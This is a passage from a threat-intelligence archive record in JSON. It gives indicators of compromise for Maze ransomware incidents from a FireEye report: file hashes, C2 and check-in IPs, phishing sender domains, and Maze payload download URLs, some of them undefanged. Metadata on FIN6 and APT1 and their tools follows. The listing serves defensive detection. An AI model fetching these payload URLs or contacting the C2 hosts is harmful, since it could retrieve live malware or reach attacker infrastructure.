27c5ecbb94b84c315d56673a851b6cf9\r\n2f78ff32cbb3c478865a88276248d419\r\n335aba8d135cc2e66549080ec9e8c8b7\r\n3bfcba2dd05e1c75f86c008f4d245f62\r\n46b98ee908d08f15137e509e5e69db1b\r\n5774f35d180c0702741a46d98190ff37\r\n5df79164b6d0661277f11691121b1d53\r\n658e9deec68cf5d33ee0779f54806cc2\r\n65cf08ffaf12e47de8cd37098aac5b33\r\n79d137d91be9819930eeb3876e4fbe79\r\n8045b3d2d4a6084f14618b028710ce85\r\n8205a1106ae91d0b0705992d61e84ab2\r\n83b8d994b989f6cbeea3e1a5d68ca5d8\r\n868d604146e7e5cb5995934b085846e3\r\n87239ce48fc8196a5ab66d8562f48f26\r\n89e1ddb8cc86c710ee068d6c6bf300f4\r\n910aa49813ee4cc7e4fa0074db5e454a\r\n9eb13d56c363df67490bcc2149229e4c\r\na0c5b4adbcd9eb6de9d32537b16c423b\r\na3a3495ae2fc83479baeaf1878e1ea84\r\nb02be7a336dcc6635172e0d6ec24c554\r\nb40a9eda37493425782bda4a3d9dad58\r\nb4d6cb4e52bb525ebe43349076a240df\r\nb6786f141148925010122819047d1882\r\nb93616a1ea4f4a131cc0507e6c789f94\r\nbd9838d84fd77205011e8b0c2bd711e0\r\nbe537a66d01c67076c8491b05866c894\r\nbf2e43ff8542e73c1b27291e0df06afd\r\nc3ce5e8075f506e396ee601f2757a2bd\r\nd2dda72ff2fbbb89bd871c5fc21ee96a\r\nd3eaab616883fcf51dcbdb4769dd86df\r\nd552be44a11d831e874e05cadafe04b6\r\ndeebbea18401e8b5e83c410c6d3a8b4e\r\ndfa4631ec2b8459b1041168b1b1d5105\r\ne57ba11045a4b7bc30bd2d33498ef194\r\ne69a8eb94f65480980deaf1ff5a431a6\r\nef95c48e750c1a3b1af8f5446fa04f54\r\nf04d404d84be66e64a584d425844b926\r\nf457bb5060543db3146291d8c9ad1001\r\nf5ecda7dd8bb1c514f93c09cea8ae00d\r\nf83cef2bf33a4d43e58b771e81af3ecc\r\nfba4cbb7167176990d5a8d24e9505f71\r\nMaze Check-in IPs\r\n91.218.114.11\r\n91.218.114.25\r\n91.218.114.26\r\n91.218.114.31\r\n91.218.114.32\r\n91.218.114.37\r\n91.218.114.38\r\n91.218.114.4\r\n91.218.114.77\r\n
91.218.114.79\r\n92.63.11.151\r\n92.63.15.6\r\n92.63.15.8\r\n92.63.17.245\r\n92.63.194.20\r\n92.63.194.3\r\n92.63.29.137\r\n92.63.32.2\r\n92.63.32.52\r\n92.63.32.55\r\n92.63.32.57\r\n92.63.37.100\r\n92.63.8.47\r\nMaze-related Domains\r\naoacugmutagkwctu[.]onion\r\nmazedecrypt[.]top\r\nmazenews[.]top\r\nnewsmaze[.]top\r\nMaze Download URLs\r\nhttp://104.168.174.32/wordupd_3.0.1.tmp\r\nhttp://104.168.198.208/wordupd.tmp\r\nhttp://104.168.201.35/dospizdos.tmp\r\nhttp://104.168.201.47/wordupd.tmp\r\nhttp://104.168.215.54/wordupd.tmp\r\nhttp://149.56.245.196/wordupd.tmp\r\nhttp://192.119.106.235/mswordupd.tmp\r\nhttp://192.119.106.235/officeupd.tmp\r\nhttp://192.99.172.143/winupd.tmp\r\nhttp://54.39.233.188/win163.65.tmp\r\nhttp://91.208.184.174:8079/windef.exe\r\nhttp://agenziainformazioni[.]icu/wordupd.tmp\r\nhttp://www.download-invoice[.]site/Invoice_29557473.exe\r\nMalicious Documents\r\n1a26c9b6ba40e4e3c3dce12de266ae10\r\n53d5bdc6bd7904b44078cf80e239d42b\r\n79271dc08052480a578d583a298951c5\r\na2d631fcb08a6c840c23a8f46f6892dd\r\nad30987a53b1b0264d806805ce1a2561\r\nc09af442e8c808c953f4fa461956a30f\r\nee26e33725b14850b1776a67bd8f2d0a\r\nBEACON C2s\r\n173.209.43.61\r\n193.36.237.173\r\n37.1.213.9\r\n37.252.7.142\r\n5.199.167.188\r\nchecksoffice[.]me\r\ndrivers.updatecenter[.]icu\r\nplaintsotherest[.]net\r\nthesawmeinrew[.]net\r\nupdates.updatecenter[.]icu\r\nCobalt Strike 
Binaries\r\n7507fe19afbda652e9b2768c10ad639f\r\na93b86b2530cc988f801462ead702d84\r\n4f57e35a89e257952c3809211bef78ea\r\nbad6fc87a98d1663be0df23aedaf1c62\r\nf5ef96251f183f7fc63205d8ebf30cbf\r\nc818cc38f46c604f8576118f12fd0a63\r\n078cf6db38725c37030c79ef73519c0c\r\nc255daaa8abfadc12c9ae8ae2d148b31\r\n1fef99f05bf5ae78a28d521612506057\r\ncebe4799b6aff9cead533536b09fecd1\r\n4ccca6ff9b667a01df55326fcc850219\r\nbad6fc87a98d1663be0df23aedaf1c62\r\nMeterpreter C2s\r\n5.199.167.188\r\nOther Related Files\r\n3A5A9D40D4592C344920DD082029B362 (related script)\r\n76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)\r\nb5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script)\r\nfad3c6914d798e29a3fd8e415f1608f4 (related script)\r\nTools \u0026 Utilities\r\n27304b246c7d5b4e149124d5f93c5b01 (PsExec)\r\n42badc1d2f03a8b1e4875740d3d49336 (7zip)\r\n75b55bb34dac9d02740b9ad6b6820360 (PsExec)\r\n9b02dd2a1a15e94922be3f85129083ac (AdFind)\r\nc621a9f931e4ebf37dace74efcce11f2 (SMBTools)\r\nf413b4a2242bb60829c9a470eea4dfb6 (winRAR)\r\nEmail Sender Domains\r\natt-customer[.]com\r\natt-information[.]com\r\natt-newsroom[.]com\r\natt-plans[.]com\r\nbezahlen-1und1[.]icu\r\nbzst-info[.]icu\r\nbzst-inform[.]icu\r\nbzstinfo[.]icu\r\nbzstinform[.]icu\r\ncanada-post[.]icu\r\ncanadapost-delivery[.]icu\r\ncanadapost-tracking[.]icu\r\nhilfe-center-1und1[.]icu\r\nhilfe-center-internetag[.]icu\r\ntrackweb-canadapost[.]icu\r\nSender Domain Registrant Addresses\r\nabusereceive@hitler.rocks\r\ngladkoff1991@yandex.ru\r\nMandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET\r\nto provide updated insight and information into the MAZE ransomware threat, and to answer questions from\r\nattendees. 
Register today to reserve your spot.\r\nSource: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html"
	],
	"report_names": [
		"tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html"
	],
	"threat_actors": [
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434694,
	"ts_updated_at": 1775792289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/82399333ab6ed280ea6f85aab99c3c267f3dec98.pdf",
		"text": "https://archive.orkl.eu/82399333ab6ed280ea6f85aab99c3c267f3dec98.txt",
		"img": "https://archive.orkl.eu/82399333ab6ed280ea6f85aab99c3c267f3dec98.jpg"
	}
}